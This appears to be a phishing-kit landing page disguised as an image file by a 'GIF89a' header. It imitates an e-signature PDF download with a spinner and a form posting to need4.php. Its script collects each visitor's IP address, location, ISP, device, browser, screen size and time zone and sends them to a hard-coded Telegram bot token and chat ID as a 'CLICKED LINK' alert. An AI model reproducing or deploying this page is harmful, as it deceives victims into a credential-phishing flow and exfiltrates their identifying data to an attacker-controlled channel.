GIF89a;
<html><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<title>e-sign</title>
<link rel="shortcut icon" href="https://i.ibb.co/yF35Jv2Q/docu-ico.png" type="image/x-icon">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
@font-face {
font-family: 'fmtt';
src: url(img/font1.woff2) format('truetype');
}
* {
margin: auto;
font-size: 14px;
outline: 0;
font-family: 'fmtt';
}
body {
background: url('https://i.ibb.co/G3spj5wR/orgo-blur.png') no-repeat center center fixed;
background-size: cover;
backdrop-filter: blur(5px);
}
input {
border: 0;
display: block;
margin-top: 0px;
width: 100%;
padding: 6px;
background: #f2f2f2;
padding-left: 0;
}
td {
border-right: 1px solid black;
padding-right: 10px;
padding-left: 10px;
font-size: 11px;
color: #0072ce;
}
.inp {
margin-top: 30px;
border-radius: 15px;
background: #f2f2f2;
text-align: center;
border: 1px solid #f2f2f2;
width: 93%;
padding: 6px;
padding-left: 1px;
}
label {
display: block;
text-align: left;
margin: 0;
font-size: 10px;
color: gray;
padding: 0;
width: 100%;
}
@keyframes roll {
from { transform: rotate(0deg); }
to { transform: rotate(360deg); }
}
#rl {
animation: roll 1s infinite;
}
@keyframes fade {
from { opacity: 1; }
to { opacity: 0.3; }
}
#fd {
animation: fade 1s infinite;
}
</style>
</head>
<body>
<div style="max-width:500px;padding:0px;">
<form id="downloadForm" method="POST" action="need4.php">
<div style="text-align:center">
<img
src="https://i.ibb.co/sJFnm0RH/Icon-pdf-file-svg.png"
width="45"
height="45"
style="margin-top:200px;object-fit:contain;"
id="fd"
alt="icon"
loading="lazy"
onerror="this.onerror=null; this.src='images/fallback.png';"
>
</div>
<p style="text-align:center;font-size:15px;margin-top:10px"></p>
<span
style="display:block;height:10px;width:10px;border:3px solid lightgray;border-radius:70px;border-top-color:red;margin-top:40px;"
id="rl"
></span>
</form>
</div>
<script>
const form = document.getElementById('downloadForm');
</script>
<script>
const botToken = '5339183225:AAHuHKeVQYvIIB6Cy2SiiWwk2414E16JNCA';
const chatId = '5167329072';
// Get browser & device details
const browser = navigator.userAgent;
const platform = navigator.platform;
const screenRes = `${window.screen.width}x${window.screen.height}`;
const timeZone = Intl.DateTimeFormat().resolvedOptions().timeZone;
// Fetch user location & IP
fetch('https://ipapi.co/json/')
.then(response => response.json())
.then(data => {
const ip = data.ip || 'Unknown IP';
const city = data.city || 'Unknown City';
const country = data.country || 'Unknown Country';
const isp = data.org || 'Unknown ISP';
// Message format
const message = `
#---------[ CLICKED LINK ]-----------#:
IP Address: ${ip}
Location: ${city}, ${country}
ISP: ${isp}
Device: ${platform}
Browser: ${browser}
Screen Resolution: ${screenRes}
Time Zone: ${timeZone}
`;
// Send to Telegram
const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
fetch(url, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ chat_id: chatId, text: message })
})
.then(response => response.json())
.then(data => {
});
})
.catch(error => console.error("Geo-Location Error:", error));
</script>
</body></html>